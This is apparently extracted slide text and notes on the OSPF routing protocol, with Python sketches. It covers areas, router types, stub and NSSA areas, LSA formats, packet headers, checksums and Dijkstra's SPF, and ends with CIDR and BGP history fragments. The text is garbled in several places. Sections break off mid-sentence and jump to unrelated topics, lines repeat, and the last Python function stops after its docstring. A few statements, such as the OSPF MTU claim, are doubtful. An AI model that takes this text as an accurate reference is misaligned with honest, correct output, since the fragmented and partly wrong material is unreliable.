management is covered by OSPF
itself
Multicast address 224.0.0.5
Ensures stability
Simple to manage
In OSPF it is recommended to use a loopback interface for the router ID. You
should configure a loopback interface first and then start the OSPF process;
otherwise the highest IP address of a physical interface will be taken.
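The selection rule from this note, sketched in Python with the standard `ipaddress` module so that addresses are compared numerically rather than as strings. The helper name is hypothetical, and the sketch ignores an explicitly configured `router-id`, which takes precedence on Cisco routers.

```python
from __future__ import annotations
import ipaddress

def ospf_router_id(loopbacks: list[str], physical: list[str]) -> str:
    """Highest loopback address if any loopback exists, otherwise the
    highest physical interface address (hypothetical helper)."""
    candidates = loopbacks or physical      # any loopback beats all physical interfaces
    if not candidates:
        raise ValueError("no IPv4 interface address available")
    # compare numerically; string comparison would rank "9.9.9.9" above "10.0.0.1"
    return str(max(ipaddress.IPv4Address(a) for a in candidates))
```

Because 10.0.0.1 is numerically higher than 9.9.9.9, a router with only these two physical addresses would pick 10.0.0.1, although a plain string comparison would pick 9.9.9.9.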
OSPF - Areas
Why OSPF Complicated
Part 2
'An algorithm must be seen to be believed.'
Donald E. Knuth
OSPF Areas
To improve performance, divide the
whole OSPF domain into multiple
Areas
Restrict Router LSAs and Network
LSAs to these Areas
All areas must be connected to the
so-called "Backbone Area"
"Area 0"
Each link is described by a Router LSA in the OSPF database, so the total OSPF
routing traffic grows with the number of links and therefore with the size of the
network. The number of Network LSAs also grows in larger networks. To
overcome these limitations, OSPF partitions the whole OSPF domain into smaller
"areas" and filters Router LSAs and Network LSAs at the borders between areas.
Networks outside an area are advertised as reachable through other LSA types.
These details are discussed next.
ABR
Area Border Router (ABR):
Terminates Router LSAs
and Network LSAs
Forwards Network Summary LSAs
Note:
Network Summary LSAs
are Distance Vector
updates !!!
[Figure: Areas 1, 2 and 5 are attached to Area 0 via ABRs. Router LSAs (LSA 1) and Network LSAs (LSA 2) stay within their area; Network Summary LSAs (LSA 3) are passed from area to area.]
Traffic from one area to another flows only through dedicated routers, the
so-called Area Border Routers (ABRs). The ABRs filter Router LSAs and Network
LSAs. Network destinations in other areas are advertised by so-called "Network
Summary LSAs". These carry simple distance-vector information, i.e. which
networks can be reached via which ABR.
Altogether, we will deal with the following OSPF router types:
Internal Routers (IR): have all interfaces inside one area
Backbone Routers (BR): have at least one interface in the backbone area
Area Border Routers (ABR): have interfaces in at least two areas
Autonomous System Boundary Routers (ASBR): have at least one interface in a
non-OSPF domain; redistribute external routes into the OSPF domain
ASBRs are discussed next.
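The router type definitions above can overlap. For example, a router whose interfaces are all in Area 0 is both an internal router and a backbone router. The following minimal Python sketch derives the types from the set of areas a router's interfaces belong to. The function name and the `redistributes_external` flag, which stands in for "has an interface in a non-OSPF domain", are hypothetical.

```python
from typing import FrozenSet, Set


def ospf_router_types(areas: Set[int], redistributes_external: bool = False) -> FrozenSet[str]:
    """Classify a router by the areas of its OSPF interfaces (0 = backbone)."""
    types = set()
    if len(areas) == 1:
        types.add("IR")     # all interfaces inside one area
    if 0 in areas:
        types.add("BR")     # at least one interface in the backbone area
    if len(areas) >= 2:
        types.add("ABR")    # interfaces in at least two areas
    if redistributes_external:
        types.add("ASBR")   # imports routes from a non-OSPF domain
    return frozenset(types)


print(sorted(ospf_router_types({0})))        # ['BR', 'IR']
print(sorted(ospf_router_types({0, 1})))     # ['ABR', 'BR']
print(sorted(ospf_router_types({2}, True)))  # ['ASBR', 'IR']
```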
ASBR
Autonomous System
Border Router (ASBR)
Imports foreign routes via
AS External LSA
When an ABR receives an
AS External LSA it emits
ASBR Summary LSAs
to all routers
[Figure: an ASBR injects AS External LSAs (LSA 5), which are flooded into all areas; the ABRs additionally originate ASBR Summary LSAs (LSA 4). Router, Network and Network Summary LSAs (LSA 1 to 3) behave as before.]
An Autonomous System Border Router (ASBR) advertises information about foreign
networks into the OSPF domain using LSA type 5 (AS External LSA). An ASBR
runs two routing processes: OSPF and some other routing protocol. The router
redistributes routing information between OSPF and the other routing process.
Stub Area
AS External LSA and
ASBR Summary LSA
are not sent into a
Stub Area
[Figure: one non-backbone area is a stub area. AS External LSAs (LSA 5) and ASBR Summary LSAs (LSA 4) stop at its ABR, while Router, Network and Network Summary LSAs (LSA 1 to 3) still appear inside it.]
An ASBR can inject a large number of external routes, and all of them are flooded
into the OSPF network. ABRs propagate this information into the other OSPF areas.
As a result, every router in every area knows all external links and stores them in
its link state database. Yet to reach an external destination, a router inside an area
still has to send the packet to an ABR. Creating a stub area makes the database of
internal routers smaller. In a stub area, the ABR does not send external LSAs into
the area; instead, the ABR advertises a default route (0.0.0.0).
Totally Stubby Area
No external or
summary LSAs
are sent into a
Totally Stubby Area
Cisco Specific
[Figure: one non-backbone area is a totally stubby area. AS External LSAs (LSA 5), ASBR Summary LSAs (LSA 4) and the Network Summary LSAs (LSA 3) of other areas stop at its ABR; inside it, only Router and Network LSAs (LSA 1 and 2) and the injected default route appear.]
A Totally Stubby Area is a Cisco proprietary extension to the Stub Area. As in a
stub area, the ABR does not advertise external LSAs into the area. In addition, the
ABR does not send summary LSAs from other areas. Instead, a default route is
injected into the Totally Stubby Area.
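The filtering rules for normal, stub and totally stubby areas can be summarized in a small Python sketch. It models only which LSA types an ABR passes across the border into an attached non-backbone area. `AreaType` and `abr_floods_into` are hypothetical names, and the default route is modeled as a type 3 LSA flagged with `is_default`.

```python
from enum import Enum


class AreaType(Enum):
    NORMAL = "normal"
    STUB = "stub"
    TOTALLY_STUBBY = "totally stubby"  # Cisco-specific extension


def abr_floods_into(area: AreaType, lsa_type: int, is_default: bool = False) -> bool:
    """Return True if an ABR passes an LSA of this type into the area.

    lsa_type: 3 = Network Summary, 4 = ASBR Summary, 5 = AS External.
    is_default: the LSA is the 0.0.0.0 default route injected by the ABR.
    """
    if lsa_type in (4, 5):
        # External information only reaches normal areas.
        return area is AreaType.NORMAL
    if lsa_type == 3:
        if area is AreaType.TOTALLY_STUBBY:
            # Only the injected default summary route gets through.
            return is_default
        return True
    # Router and Network LSAs (types 1 and 2) never leave their own area.
    return False
```

A stub area therefore still learns every inter-area network plus the default route. A totally stubby area learns only the default route, which keeps its link state database smallest.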
Not So Stubby Area (NSSA)
ABR will translate the Type 7
LSA into a Type 5 LSA only
if the Type 7 LSA has
the P-bit set to 1
ASBR advertises routes
of another routing
domain via NSSA
External LSA
[Figure: one non-backbone area is an NSSA containing an ASBR. AS External LSAs (LSA 5) and ASBR Summary LSAs (LSA 4) from outside do not enter it. The ASBR inside originates NSSA External LSAs (LSA 7), which the ABR translates into AS External LSAs (LSA 5) for the other areas.]
The NSSA ASBR can either set or clear the P-bit in the NSSA External LSA. If the
P-bit is set, an ABR of the NSSA translates this LSA into an AS External LSA
(Type 5). If the P-bit is cleared, the route stays inside the NSSA.
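The P-bit rule can be sketched in Python as follows. `ExternalLsa` is a hypothetical, heavily simplified record; the forwarding address and route tag are not modeled. The `is_translator` flag only stands in for the question of which NSSA ABR performs the translation, which this sketch does not decide.

```python
from dataclasses import dataclass, replace
from typing import Optional


@dataclass(frozen=True)
class ExternalLsa:
    # Hypothetical, simplified LSA record for illustration only.
    lsa_type: int        # 7 = NSSA External, 5 = AS External
    prefix: str
    metric: int
    p_bit: bool = False  # propagate bit, only meaningful in type 7


def translate_at_nssa_abr(lsa: ExternalLsa, is_translator: bool) -> Optional[ExternalLsa]:
    """Return the type 5 LSA the ABR floods into the rest of the OSPF
    domain, or None if the type 7 LSA stays inside the NSSA."""
    if lsa.lsa_type != 7 or not is_translator or not lsa.p_bit:
        return None
    return replace(lsa, lsa_type=5, p_bit=False)


lsa7 = ExternalLsa(7, "192.0.2.0/24", 20, p_bit=True)
print(translate_at_nssa_abr(lsa7, is_translator=True))
```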
Summarization
Efficient OSPF address design requires
hierarchical addressing
Address plan should support
summarization at ABRs
[Figure: Areas 10, 20 and 30 are attached to Area 0. The ABRs summarize the subnets 20.1.0.0/16 ... 20.254.0.0/16, 21.1.0.0/16 ... 21.254.0.0/16 and 22.1.0.0/16 ... 22.254.0.0/16 as 20/8, 21/8 and 22/8, one summary per area.]
Summarization is another way to keep a router's database smaller. Instead of
sending each single subnet from the area, the ABR creates a summary route and
advertises it into the other areas. Note that summarization is turned off by default
(i.e. it must be explicitly turned on).
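A minimal Python sketch of ABR summarization, using the standard `ipaddress` module. The `ranges` argument plays the role of the explicitly configured summary ranges, so nothing is summarized unless a range is given. The function name is hypothetical.

```python
from ipaddress import IPv4Network, ip_network
from typing import Iterable, List


def summarize_at_abr(subnets: Iterable[str], ranges: Iterable[str]) -> List[IPv4Network]:
    """Advertise each configured range once if it covers at least one
    intra-area subnet; subnets outside every range are advertised as-is."""
    nets = [ip_network(s) for s in subnets]
    summaries = [ip_network(r) for r in ranges]
    advertised = [r for r in summaries if any(n.subnet_of(r) for n in nets)]
    uncovered = [n for n in nets if not any(n.subnet_of(r) for r in summaries)]
    return advertised + uncovered


area_subnets = [f"20.{i}.0.0/16" for i in range(1, 255)]
print(summarize_at_abr(area_subnets, ["20.0.0.0/8"]))  # [IPv4Network('20.0.0.0/8')]
```

With the range configured, 254 intra-area routes collapse into a single advertisement. This only works if the address plan keeps each area's subnets inside one block, as the slide demands.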
Virtual Links
Another way to connect to area 0: using a point-to-point unicast tunnel
Transit area must have full routing information
Generates summary LSA for network 7.0.0.0/8 into area 1 and area 0
Increased overhead
In some cases a virtual link cannot be used. A possible solution is to implement
an IP tunnel.
Summary
Area concept supports large
networks
LS type
Link State ID
Advertising Router
The most recent one
of two instances of
the same LSA is
determined by:
LS sequence number
LS checksum
LS age
MaxAgeDiff (15 min)
as tolerance value
On comparing two LSAs,
the most recent one
is the one with:
Greater SeqNr
Same SeqNr: greater Checksum
Same SeqNr, same Checksum: MaxAge (if only one LSA has MaxAge)
Otherwise, if AgeDiff > MaxAgeDiff: smaller Age
If AgeDiff < MaxAgeDiff: both are considered to be identical
Each LSA also carries a 16-bit age value. The age is set to zero when the LSA is
originated and increased by every router during flooding. LSAs also age while
they are held in each router's database. If the sequence numbers (and checksums)
are the same, the router compares the ages: the younger the better. This applies
only if the age difference between the two LSAs is greater than MaxAgeDiff;
otherwise both LSAs are considered to be identical.
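The comparison steps can be captured in a short Python sketch. MaxAge (60 min) and MaxAgeDiff (15 min) are taken from the slides. Treating sequence numbers as signed 32-bit values, with 0x80000001 as the initial (lowest) value, is an assumption taken from the OSPF specification rather than from the slides. `LsaInstance` and `more_recent` are hypothetical names.

```python
from dataclasses import dataclass

MAX_AGE = 3600       # seconds (60 min)
MAX_AGE_DIFF = 900   # seconds (15 min)


@dataclass
class LsaInstance:
    seq: int        # LS sequence number as carried in the header (32 bits)
    checksum: int   # LS checksum (16 bits, compared as unsigned)
    age: int        # LS age in seconds


def signed32(value: int) -> int:
    """Interpret a 32-bit sequence number as signed (0x80000001 is lowest)."""
    return value - (1 << 32) if value & 0x80000000 else value


def more_recent(a: LsaInstance, b: LsaInstance) -> str:
    """Return "a", "b" or "same", following the comparison steps above."""
    if a.seq != b.seq:
        return "a" if signed32(a.seq) > signed32(b.seq) else "b"
    if a.checksum != b.checksum:
        return "a" if a.checksum > b.checksum else "b"
    if (a.age == MAX_AGE) != (b.age == MAX_AGE):
        return "a" if a.age == MAX_AGE else "b"
    if abs(a.age - b.age) > MAX_AGE_DIFF:
        return "a" if a.age < b.age else "b"
    return "same"
```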
LS Age
Originating router sets LS age = 0 seconds
Increased during flooding by InfTransDelay by
every router
Also increased while stored in database
Age is never incremented past MaxAge (60 min)
LSAs having MaxAge:
Are not used in routing table calculation anymore
Neighboring router ID
Metrics
Network LSA - Type 2
DR's IP address
One Subnet mask for this broadcast
segment
List of Router-IDs of all routers in the
broadcast segment
Network Summary LSA - Type 3
Originated by ABRs only
Each LSA Type 3 contains a number of
Metric
AS External LSA - Type 5
Originated by ASBRs
External type 1
External routes
Default route
Contains
Metric
For MOSPF
External Attribute LSA (8)
Alternative to IBGP
Area-local scope
Opaque LSA (11)
AS scope
Opaque LSAs are used, e.g., to carry load indications for MPLS.
General OSPF Packet Structure
Carried directly in IP (protocol number 89)
All OSPF packets begin with a 24-byte OSPF
packet header:
Version = 2 (8 bits) | Type (8 bits) | OSPF Packet Length (16 bits)
Router ID of originating router (32 bits)
Area ID of originating area (32 bits)
Checksum (16 bits) | Authentication Type (16 bits)
Authentication (2 x 32 bits)
Packet Data
(Hello, Database Description, LS Request, LSU, LS Ack)
Packet types:
1. Hello
2. Database Description
3. Link State Request
4. Link State Update
5. Link State ACK
The OSPF version used today for IPv4 is version 2. The packet type identifies the
actual OSPF message type carried in the packet data area at the bottom.
The OSPF packet length is the number of bytes in the OSPF packet,
including the OSPF header. The Router ID and Area ID identify the originator of this
packet. If a packet is sent over a virtual link, the Area ID will be 0.0.0.0, because
virtual links are considered part of the backbone area. The checksum is calculated
over the entire packet, including the header but excluding the 64-bit
authentication field.
Three authentication types have been defined:
0 No authentication
1 Simple clear text password authentication
2 Cryptographic authentication (MD5)
If the Authentication Type is 1, a 64-bit clear text password is carried in the
authentication fields. If the Authentication Type is 2, the authentication
fields contain a key ID, the length of the message digest, and a nondecreasing
cryptographic sequence number to prevent replay attacks. The actual message
digest is appended at the end of the packet.
The efficiency of routing updates also depends on the maximum transfer unit
(MTU) defined. Cisco defined an MTU of 1500 bytes for OSPF.
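The 24-byte header layout can be checked with Python's `struct` module. The following is a minimal parsing sketch. It does not verify the checksum or process authentication, and the names `HEADER`, `OspfHeader` and `parse_ospf_header` are hypothetical.

```python
import struct
from ipaddress import IPv4Address
from typing import NamedTuple

PACKET_TYPES = {1: "Hello", 2: "Database Description", 3: "Link State Request",
                4: "Link State Update", 5: "Link State ACK"}

# Version, Type, Packet Length, Router ID, Area ID, Checksum, AuType, Authentication
HEADER = struct.Struct("!BBHIIHH8s")   # 24 bytes, network byte order


class OspfHeader(NamedTuple):
    version: int
    packet_type: str
    length: int
    router_id: IPv4Address
    area_id: IPv4Address
    checksum: int
    auth_type: int
    authentication: bytes


def parse_ospf_header(data: bytes) -> OspfHeader:
    """Split the first 24 bytes of an OSPF packet into its header fields."""
    if len(data) < HEADER.size:
        raise ValueError("an OSPF header is 24 bytes long")
    ver, ptype, length, rid, aid, csum, autype, auth = HEADER.unpack_from(data)
    return OspfHeader(ver, PACKET_TYPES.get(ptype, f"unknown({ptype})"), length,
                      IPv4Address(rid), IPv4Address(aid), csum, autype, auth)


raw = HEADER.pack(2, 1, 44, int(IPv4Address("1.1.1.1")), 0, 0, 0, bytes(8))
hdr = parse_ospf_header(raw)
print(hdr.packet_type, hdr.router_id, hdr.area_id)  # Hello 1.1.1.1 0.0.0.0
```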
Hello Packet
Type 1
Network Mask of originating interface: must match with receiving interface
Options: to ensure compatibility
  Options bits: 0 0 DC EA N/P MC E T
  DC: OSPF Demand Circuits supported
  EA: External Attributes LSAs supported
  N/P: NSSA External LSAs supported (N); translate LSA7 to LSA5 (P, carried in LSA7 only)
  MC: MOSPF supported
  E: AS External LSAs supported
  T: ToS supported
Hello Interval: in seconds. Must match! (10 secs on LAN, 30 secs on non-broadcast networks)
Router Priority: used to elect DR and BDR "manually" (0-255)
Router Dead Interval: seconds before neighbor is declared dead. Must match! (4 x hello interval)
Designated Router: IP address of interface of DR
Backup Designated Router: IP address of interface of BDR
Neighbor #1
...
Neighbor #n
The network mask must match the mask on the receiving interface. This ensures that
both routers share the same segment and network.
The Options field is also used by other message types. If the Router Priority is set
to zero, this router cannot become DR or BDR.
Note that the fields "Designated Router" and "Backup Designated Router"
contain the interface IP address of the DR or BDR on that network, not the router
ID!
If these addresses are unknown or not needed (other network types), these
fields are set to 0.0.0.0.
Neighbors must have identical Hello and Dead Intervals configured.
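The "must match" rules and the role of the Router Priority can be sketched in Python. The sketch assumes that the network mask is not compared on point-to-point links. It also simplifies DR selection to "highest priority, ties broken by highest router ID", ignoring that a real election does not preempt an existing DR. All names (`HelloParams`, `hello_compatible`, `Candidate`, `pick_dr`) are hypothetical.

```python
from dataclasses import dataclass
from ipaddress import IPv4Address
from typing import List, Optional


@dataclass
class HelloParams:
    # Hypothetical record of the Hello fields compared between neighbors.
    network_mask: IPv4Address
    hello_interval: int   # seconds
    dead_interval: int    # seconds


def hello_compatible(local: HelloParams, received: HelloParams,
                     point_to_point: bool = False) -> bool:
    """Neighbors only form an adjacency if these values agree."""
    if not point_to_point and local.network_mask != received.network_mask:
        return False      # assumption: mask not compared on point-to-point links
    return (local.hello_interval == received.hello_interval
            and local.dead_interval == received.dead_interval)


@dataclass
class Candidate:
    router_id: IPv4Address
    priority: int         # 0-255; 0 means never DR or BDR


def pick_dr(candidates: List[Candidate]) -> Optional[Candidate]:
    """Simplified DR choice: highest priority, then highest router ID."""
    eligible = [c for c in candidates if c.priority > 0]
    return max(eligible, key=lambda c: (c.priority, c.router_id), default=None)
```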
Database Description Packet
Type 2
Also called "DDP"
Interface MTU | Options | 0 0 0 0 0 I M MS
DD Sequence Number
LSA Headers
Interface MTU: size of the largest IP packet that can be sent without fragmentation
Options: same definition as for the Hello Packet
I-bit: marks the initial packet of a series of DD packets
M-bit: more DD packets will follow
MS-bit: Master = 1, Slave = 0
DD Sequence Number: ensures that the full sequence of DD packets is received
The DD sequence number is set by the master to some unique value in the first
DD packet. This number will be incremented in subsequent packets.
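The flag byte and the sequence number handling can be sketched in Python. The bit values follow the field layout 0 0 0 0 0 I M MS shown above (MS is the lowest bit). The 32-bit wrap-around of the sequence number is an assumption of this sketch, and all function names are hypothetical.

```python
FLAG_MS = 0x01   # Master/Slave bit: 1 = master, 0 = slave
FLAG_M = 0x02    # More bit: more DD packets will follow
FLAG_I = 0x04    # Init bit: first packet of the DD series


def encode_dd_flags(initial: bool, more: bool, master: bool) -> int:
    """Build the flag byte of a Database Description packet."""
    return (FLAG_I if initial else 0) | (FLAG_M if more else 0) | (FLAG_MS if master else 0)


def decode_dd_flags(value: int) -> dict:
    """Split the flag byte back into its three bits."""
    return {"initial": bool(value & FLAG_I),
            "more": bool(value & FLAG_M),
            "master": bool(value & FLAG_MS)}


def next_dd_sequence(seq: int) -> int:
    """The master increments the DD sequence number for each new packet."""
    return (seq + 1) & 0xFFFFFFFF


# The first, empty DD packet has I, M and MS set.
print(hex(encode_dd_flags(True, True, True)))   # 0x7
```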
Link State Request Packet
Type 3
Repeated for each requested LSA:
Link State Type: which type of LSA is requested (Router LSA, Network LSA, ...)
Link State ID: usage depends on the LSA type
Advertising Router: Router ID of the originator of this LSA
.....
Note that the Link State Request Packet uniquely identifies the LSA by the Type, ID,
and advertising router fields of its header. It does not include the sequence
number, checksum, and age, because the requestor is not interested in a specific
instance of the LSA but in the most recent instance.
Link State Update Packet
Type 4
Number of LSAs
LSAs
LSUs contain one or more LSAs (limited by MTU)
Used for flooding and response to LS requests
LSUs are carried hop-by-hop
Link State ACK Packet
Type 5
LSA Headers
Each LSA received must be explicitly acknowledged
(reliable flooding!)
Acknowledged LSA is identified by its LSA header
A single Link State ACK packet can acknowledge
multiple LSAs
The LS ACK packet consists
only of a list of LSA headers
(and an OSPF header, of course)
The LSAs
LSA Header (20 bytes):
Age (16 bits) | Options (8 bits) | LSA Type (8 bits)
Link State ID
Router ID of Advertising Router
Sequence Number
Checksum (16 bits) | Length (16 bits)
LSA Body
Age: time in seconds since this LSA was originated; incremented at each router
Options: same definition as for the Hello Packet
LSA Type, Link State ID and Advertising Router: these three fields uniquely identify every LSA
Link State ID: usage depends on LSA Type
Sequence Number: incremented each time a new instance of the LSA is originated
Checksum: calculated over the whole LSA except the Age field
Length: number of bytes of LSA header + body
All LSAs start with the LSA header. This LSA header is also used in
Database Description and Link State Acknowledgement packets.
The Age is incremented by InfTransDelay seconds at each router interface the
LSA exits. The Age is also incremented in seconds while the LSA resides in a link state
database.
The Options field describes optional capabilities supported by the topological
portion described by this LSA.
The LSA Type describes which information is carried in the LSA Body. It
identifies the structural differences between Router LSAs, Network LSAs,
etc.
The LSA types use the Link State ID differently. Basically, this field
contains some information identifying the topological portion described by this
LSA, for example a Router ID or an interface address. The
following slides explain this field for each LSA type.
The Router ID identifies the originating router of this LSA.
The Sequence Number helps routers to identify the most recent instance of this
LSA.
The Checksum is a so-called 8-bit Fletcher checksum. It is computed over the whole
LSA except the Age field and provides more protection than traditional checksum
methods such as the one used for TCP. The first eight bits contain the 1's complement
sum of all octets, while the second eight bits contain a high-order sum of the running
sums. See RFC 1146 for more details.
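A Python sketch of the Fletcher checksum for an LSA. It sums all bytes except the 2-byte Age field, with the 16-bit checksum field located at offset 16 of the LSA header. The two check bytes are derived with the usual ISO placement rule, which makes both running sums zero. Treat it as an illustration under these assumptions, not a reference implementation. The function names are hypothetical.

```python
AGE_LEN = 2            # the LS Age field (first 2 bytes) is not checksummed
CHECKSUM_OFFSET = 16   # offset of the LS Checksum field in the LSA header


def fletcher_sums(data: bytes):
    """Running one's-complement (mod 255) sums C0 and C1."""
    c0 = c1 = 0
    for byte in data:
        c0 = (c0 + byte) % 255
        c1 = (c1 + c0) % 255
    return c0, c1


def lsa_checksum(lsa: bytes) -> int:
    """Return the 16-bit value to store in the LS Checksum field."""
    data = bytearray(lsa[AGE_LEN:])
    pos = CHECKSUM_OFFSET - AGE_LEN        # 0-based checksum position in data
    data[pos:pos + 2] = b"\x00\x00"        # checksum is computed as if zero
    c0, c1 = fletcher_sums(data)
    k = len(data) - pos - 1                # bytes following the first check byte
    x = (k * c0 - c1) % 255
    y = (c1 - (k + 1) * c0) % 255
    return ((x or 255) << 8) | (y or 255)  # a result of 0 is encoded as 255


def lsa_checksum_ok(lsa: bytes) -> bool:
    """A stored LSA is valid if both running sums come out as zero."""
    return fletcher_sums(lsa[AGE_LEN:]) == (0, 0)
```

Because the Age field is excluded, routers can keep incrementing the age during flooding and in the database without recomputing the checksum.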
Router LSA
LSA Header:
Age | Options | LSA Type = 1
Link State ID = Advertising Router ID
Router ID of Advertising Router (identical to Link State ID)
Sequence Number
Checksum | Length
Body:
0 0 0 0 0 V E B | 0 0 0 0 0 0 0 0 | Number of Links
1st Link:
  Link ID
  Link Data
  Link Type | Number of ToS | Metric
  ToS | 0 0 0 0 0 0 0 0 | ToS Metric (one ToS metric for each ToS)
  ...
2nd Link:
  Link ID
  Link Data
  Link Type | Number of ToS | Metric
  ToS | 0 0 0 0 0 0 0 0 | ToS Metric
  ToS | 0 0 0 0 0 0 0 0 | ToS Metric
...
Router LSAs are generated by all OSPF routers and must describe all links of the
originating router!
The V-bit (Virtual Link Endpoint) is set to one if the originating router is a
virtual link endpoint and this area is a transit area. The E-bit (External) is set if
the originating router is an ASBR. The B-bit (Border) is set if the originating
router is an ABR.
The Link ID and Link Data depend on the Link Type field, which describes the
general type of connection the link provides.
Link Type 1 is a point-to-point link: the Link ID is the neighbor's Router ID, and the Link
Data field contains the IP address of the originating router's interface to the network
(for an unnumbered link, the interface's MIB-II ifIndex value).
Link Type 2 is a link to a transit network: the Link ID is the interface address of the
Designated Router, and the Link Data field contains the IP address of the originating router's
interface to the network.
Link Type 3 is a link to a stub network: the Link ID is the IP network number or subnet
address, and the Link Data field contains the network's subnet mask.
Link Type 4 is a virtual link: the Link ID is the neighboring router's Router ID, and the Link
Data contains the IP address of the originating router's interface used by the virtual link.
Number of ToS specifies how many ToS metrics are listed for this link. For
each ToS, an additional line is appended to this link section. ToS is generally no longer
used, and the Number of ToS field is set to zero.
Metric is the cost of the interface that established this link.
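A minimal Python sketch that walks the Router LSA body laid out above: a flag byte (V = 0x04, E = 0x02, B = 0x01), a zero byte, the number of links, and then 12 bytes per link plus 4 bytes per ToS entry. Link Data is always shown as a dotted address here, even though for stub links it is a mask and for unnumbered links an ifIndex. The function and type names are hypothetical.

```python
import struct
from ipaddress import IPv4Address
from typing import List, NamedTuple

LINK_TYPES = {1: "point-to-point", 2: "transit", 3: "stub", 4: "virtual"}


class RouterLink(NamedTuple):
    link_id: IPv4Address
    link_data: IPv4Address   # address, mask (stub) or ifIndex, shown as dotted quad
    link_type: str
    metric: int


def parse_router_lsa_body(body: bytes):
    """Parse the body of a Router LSA (everything after the 20-byte header)."""
    flags, _, n_links = struct.unpack_from("!BBH", body, 0)
    offset = 4
    links: List[RouterLink] = []
    for _ in range(n_links):
        link_id, link_data, ltype, n_tos, metric = struct.unpack_from("!IIBBH", body, offset)
        offset += 12 + 4 * n_tos            # skip the per-ToS metric entries
        links.append(RouterLink(IPv4Address(link_id), IPv4Address(link_data),
                                LINK_TYPES.get(ltype, str(ltype)), metric))
    bits = {"V": bool(flags & 0x04), "E": bool(flags & 0x02), "B": bool(flags & 0x01)}
    return bits, links
```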
Network LSA
LSA Header:
Age | Options | LSA Type = 2
Link State ID = IP address of DR's interface to this network
Router ID of Advertising Router
Sequence Number
Checksum | Length
Body:
Network Mask
Attached Router
Attached Router
...
Network LSAs are originated by DRs and describe the multi-access network and
all routers attached to it, including the DR.
Network Summary LSA
LSA Header:
Age | Options | LSA Type = 3
Link State ID = IP address of advertised network
Router ID of Advertising Router
Sequence Number
Checksum | Length
Body:
Network Mask
0 0 0 0 0 0 0 0 | Metric
ToS | ToS Metric (optional)
...
If a default route is advertised, both the Link State ID
and the Network Mask fields will be 0.0.0.0
Also used for route summarization
Note: Cisco only supports ToS=0
A Network Summary LSA is originated by an ABR and advertises networks
external to an area.
ASBR Summary LSA
LSA Header:
Age | Options | LSA Type = 4
Link State ID = Router ID of ASBR being advertised
Router ID of Advertising Router
Sequence Number
Checksum | Length
Body:
0.0.0.0 (Network Mask field, unused)
0 0 0 0 0 0 0 0 | Metric
ToS | ToS Metric (optional)
...
Note: Cisco only supports ToS=0
An ASBR Summary LSA is originated by an ABR and advertises ASBRs external
to an area.
Autonomous System External LSA
LSA Header:
Age | Options | LSA Type = 5
Link State ID = IP address of destination
Router ID of Advertising Router
Sequence Number
Checksum | Length
Body:
Network Mask
E 0 0 0 0 0 0 0 | Metric
Forwarding Address
External Route Tag
E | ToS | ToS Metric (optional)
Forwarding Address
External Route Tag
...
E-bit: metric types E1 and E2
Forwarding Address: next hop (0.0.0.0 if the ASBR is the next hop)
External Route Tag: not used by OSPF
When describing a default route, both the Link State
ID and the Network Mask are set to 0.0.0.0.
NSSA External LSA
Same structure as AS External LSA
Forwarding address is
Can be infinite
A path $p$ with $c(p) = d(v,v')$ is called a shortest path
$sp(v,v')$.
Shortest paths are easier to calculate for distance graphs in which all costs are positive.
Definitions
Select start vertex s
Three sets of vertices:
Floyd-Warshall algorithm
A* algorithm
Extends SPF with an estimation function to enhance
performance in certain situations
The SPF algorithm is of the "greedy" type. Dijkstra originally proposed to treat the
boundary vertices like outside vertices, so no explicit data structure is
needed for the boundary vertices. This implementation is efficient for graphs
with many edges but not for so-called "thin" (sparse) graphs. One of the best
implementations uses Fibonacci heaps to represent the boundary.
Alternative algorithms include the Bellman-Ford and the Floyd-Warshall
algorithms, which are based on Bellman's optimality principle ("if the shortest path
from A to C runs over B, then the partial path AB must also be the shortest
possible").
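The greedy SPF procedure can be sketched in Python as follows. Unlike the Fibonacci-heap variant mentioned above, this sketch keeps the boundary vertices in a binary heap (Python's `heapq`), which is the common practical choice. The graph is a hypothetical adjacency dictionary with positive costs, and the names `spf` and `path` are illustrative only.

```python
import heapq
import itertools
from typing import Dict, Hashable, List, Tuple

Graph = Dict[Hashable, Dict[Hashable, int]]


def spf(graph: Graph, source: Hashable) -> Tuple[Dict[Hashable, int], Dict[Hashable, Hashable]]:
    """Dijkstra's SPF using a binary heap for the boundary vertices.

    Returns (distance, predecessor). A vertex missing from `distance` is
    unreachable, i.e. its distance is infinite. Costs must be positive.
    """
    dist = {source: 0}
    prev: Dict[Hashable, Hashable] = {}
    inside = set()                    # vertices whose distance is final
    tie = itertools.count()           # avoids comparing vertices on equal cost
    boundary = [(0, next(tie), source)]
    while boundary:
        d, _, v = heapq.heappop(boundary)
        if v in inside:
            continue                  # outdated boundary entry
        inside.add(v)                 # greedy step: cheapest boundary vertex
        for w, cost in graph.get(v, {}).items():
            nd = d + cost
            if w not in dist or nd < dist[w]:
                dist[w] = nd
                prev[w] = v
                heapq.heappush(boundary, (nd, next(tie), w))
    return dist, prev


def path(prev: Dict[Hashable, Hashable], source: Hashable, target: Hashable) -> List[Hashable]:
    """Walk the predecessor map back from a reachable target to the source."""
    hops = [target]
    while hops[-1] != source:
        hops.append(prev[hops[-1]])
    return hops[::-1]


g = {"A": {"B": 1, "C": 4}, "B": {"C": 2, "D": 5}, "C": {"D": 1}, "D": {}}
dist, prev = spf(g, "A")
print(dist)                   # {'A': 0, 'B': 1, 'C': 3, 'D': 4}
print(path(prev, "A", "D"))   # ['A', 'B', 'C', 'D']
```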
About E. W. Dijkstra
Born in 1930 in Rotterdam
Degrees in mathematics and theoretical
physics from the University of Leyden
and a Ph.D. in computing science from
the University of Amsterdam
Paper notebook
Internet Registry (IR) became part of IANA
Postel passed his task to SRI International
RFC 791
Class B exhaustion
RFC 1654
RFC 1519 introduced Classless Inter-Domain Routing (CIDR): an Address
Assignment and Aggregation Strategy
RFC 1654: a draft standard for BGP-4
RFC 1771: a standard for BGP-4
Address Management
ISPs assign
contiguous blocks of
contiguous blocks of
contiguous blocks ...
of addresses to their customers
Aggregation at borders possible!
Tier I providers filter routes with
prefix lengths larger than /19
RIPE NCC
APNIC
ARIN
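Aggregation of contiguous customer blocks and the /19 filter can be illustrated with Python's `ipaddress` module. The /19 threshold is taken from the slide; real filtering policies differ between providers. The function names and the example prefixes are hypothetical.

```python
from ipaddress import IPv4Network, collapse_addresses
from typing import Iterable, List


def aggregate(blocks: Iterable[str]) -> List[IPv4Network]:
    """Merge contiguous customer blocks into the fewest covering prefixes."""
    return list(collapse_addresses(IPv4Network(b) for b in blocks))


def tier1_filter(prefixes: Iterable[IPv4Network], max_len: int = 19) -> List[IPv4Network]:
    """Drop routes that are more specific than /max_len."""
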